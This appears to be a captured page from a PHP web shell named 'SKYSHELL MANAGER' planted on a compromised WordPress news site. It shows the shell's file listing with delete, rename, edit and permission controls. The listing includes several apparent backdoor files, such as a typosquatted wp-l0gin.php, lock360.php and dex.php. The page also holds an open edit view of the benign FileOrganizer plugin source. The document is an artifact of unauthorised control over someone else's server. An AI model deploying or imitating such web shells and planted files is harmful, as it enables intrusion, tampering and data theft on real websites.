📁
SKYSHELL MANAGER
PHP v8.3.32
Create
Create
Path:
root
/
home
/
nnoticias
/
public_html
/
Name
Size
Perm
Actions
📁
.tmb
-
0777
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
3ee10
-
0555
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
d4bf7e
-
0755
🗑️
🏷️
🔒
📁
sap-logs
-
0755
🗑️
🏷️
🔒
📁
seo
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.bk
2.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess_backup
5.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.litespeed_flag
0.29 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
cleanup.php
2.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
dex.php
77.53 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
5.02 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
htaccess.txt
0.81 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
12.78 KB
0555
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
0.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
lock360.php
47.55 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.57 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.25 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.44 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
search.php
1.47 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
worksec.php
1.06 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.18 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
4.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-editor.php
53.57 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-l0gin.php
170.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
30.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.71 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-theme.php
216.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: fileorganizer.php
<?php /* * FILEORGANIZER * https://fileorganizer.net/ * (c) FileOrganizer Team */ if(!defined('FILEORGANIZER_VERSION')){ die('Hacking Attempt!'); } // The fileorganizer Header function fileorganizer_page_header($title = 'FILE ORGANIZER'){ global $fileorganizer; // Enqueue required scripts and styles wp_enqueue_script('forg-elfinder'); wp_enqueue_script('forg-lang'); wp_enqueue_style('forg-elfinder'); wp_enqueue_style('forg-theme'); ?> <div class="fileorganizer_wrap"> <table cellpadding="2" class="fileorganizer-header" cellspacing="1" width="100%" border="0"> <tr> <td> <div class="fileorganizer-td"> <img src="<?php echo esc_url(FILEORGANIZER_URL); ?>/images/logo.png" /> <h3 class="fileorganizer-heading"><?php echo esc_html($title)?></h3> </div> </td> <?php if(current_user_can('manage_options')){ $theme = !empty($fileorganizer->options['theme']) ? $fileorganizer->options['theme'] : ''; ?> <td class="fileorganizer-options"> <div class="fileorganizer-td"> <label><?php esc_html_e('Theme'); ?></label> <select id="fileorganizer-theme-switcher"> <option <?php selected($theme, 'default'); ?> value=""><?php esc_html_e('Default'); ?></option> <option <?php selected($theme, 'dark'); ?> value="dark"><?php esc_html_e('Dark'); ?></option> <option <?php selected($theme, 'material'); ?> value="material"><?php esc_html_e('Material'); ?></option> <option <?php selected($theme, 'material-dark'); ?> value="material-dark"><?php esc_html_e('Material Dark'); ?></option> <option <?php selected($theme, 'material-gray'); ?> value="material-gray"><?php esc_html_e('Material Light'); ?></option> <option <?php selected($theme, 'windows10'); ?> value="windows10"><?php esc_html_e('Windows 10'); ?></option> </select> </div> </td> <?php } ?> </tr> </table> <?php } // Fileorganizer Settings footer function fileorganizer_page_footer($no_twitter = 0){ echo '</div> <div class="fileorganizer_footer_wrap"> <a href="https://fileorganizer.net" target="_blank">'.esc_html__('FileOrganizer').'</a><span> v'.esc_html(FILEORGANIZER_VERSION).' You can report any bugs </span><a href="https://wordpress.org/support/plugin/fileorganizer" target="_blank">here</a>. </div>'; } function fileorganizer_render_page(){ global $fileorganizer; echo '<div class="wrap">'; fileorganizer_page_header(); echo '<div id="fileorganizer_elfinder"></div>'; if(!defined('SITEPAD')){ fileorganizer_page_footer(); } // Editor configurations $elfinder_config = 'url: fileorganizer_ajaxurl, customData: { action: "fileorganizer_file_folder_manager", fileorganizer_nonce: fileorganizer_ajax_nonce, }, defaultView: "'.(!empty($fileorganizer->options['default_view']) ? esc_html($fileorganizer->options['default_view']) : 'list').'", height: 500, lang: fileorganizer_lang, soundPath: fileorganizer_url+"/sounds/", cssAutoLoad : false, uploadMaxChunkSize: 1048576000000, baseUrl: fileorganizer_url, requestType: "post", commandsOptions: { edit : { mimes : [], editors : [{ info : { id : "codemirror", name : "Code Editor", }, mimes : [ "text/plain", "text/html", "text/javascript", "text/css", "text/x-php", "application/x-php", ], load : function(textarea) { var mimeType = this.file.mime; return wp.CodeMirror.fromTextArea(textarea, { mode: mimeType, indentUnit: 4, lineNumbers: true, viewportMargin: Infinity, lineWrapping: true, }); }, close : function(textarea, instance) { this.myCodeMirror = null; }, save: function(textarea, editor) { jQuery(textarea).val(editor.getValue()); } }] } }, ui: ["toolbar", "tree", "path", "stat"],'; $elfinder_uiOptions = 'uiOptions:{ toolbarExtra : { autoHideUA: [], displayTextLabel: "none", preferenceInContextmenu: false, }, },'; $elfinder_config .= apply_filters('fileorganizer_elfinder_script', $elfinder_uiOptions); ?> <script> var fileorganizer_ajaxurl = "<?php echo esc_url(admin_url( 'admin-ajax.php' )); ?>"; var fileorganizer_ajax_nonce = "<?php echo esc_html(wp_create_nonce('fileorganizer_ajax')); ?>"; var fileorganizer_url = "<?php echo esc_url(FILEORGANIZER_URL); ?>/manager/"; var fileorganizer_lang = "<?php echo !empty($fileorganizer->options['default_lang']) ? esc_html(sanitize_file_name($fileorganizer->options['default_lang'])) : 'en' ?>"; jQuery(document).ready(function() { jQuery('#fileorganizer_elfinder').elfinder({ <?php echo $elfinder_config; ?> }).elfinder("instance"); <?php if(current_user_can('manage_options')){ ?> jQuery('#fileorganizer-theme-switcher').change(function(){ var theme = jQuery(this).val(); jQuery.ajax({ url: fileorganizer_ajaxurl, data:{ action: 'fileorganizer_switch_theme', fileorganizer_nonce: fileorganizer_ajax_nonce, theme: theme }, dataType: 'json', type: 'post', success:function(resp){ if(typeof resp.error != 'undefined'){ alert(resp.error); return; } if(resp.stylesheet != undefined){ jQuery('#forg-theme-css').attr('href', resp.stylesheet); } } }); }); <?php } ?> }); </script> <?php }
Save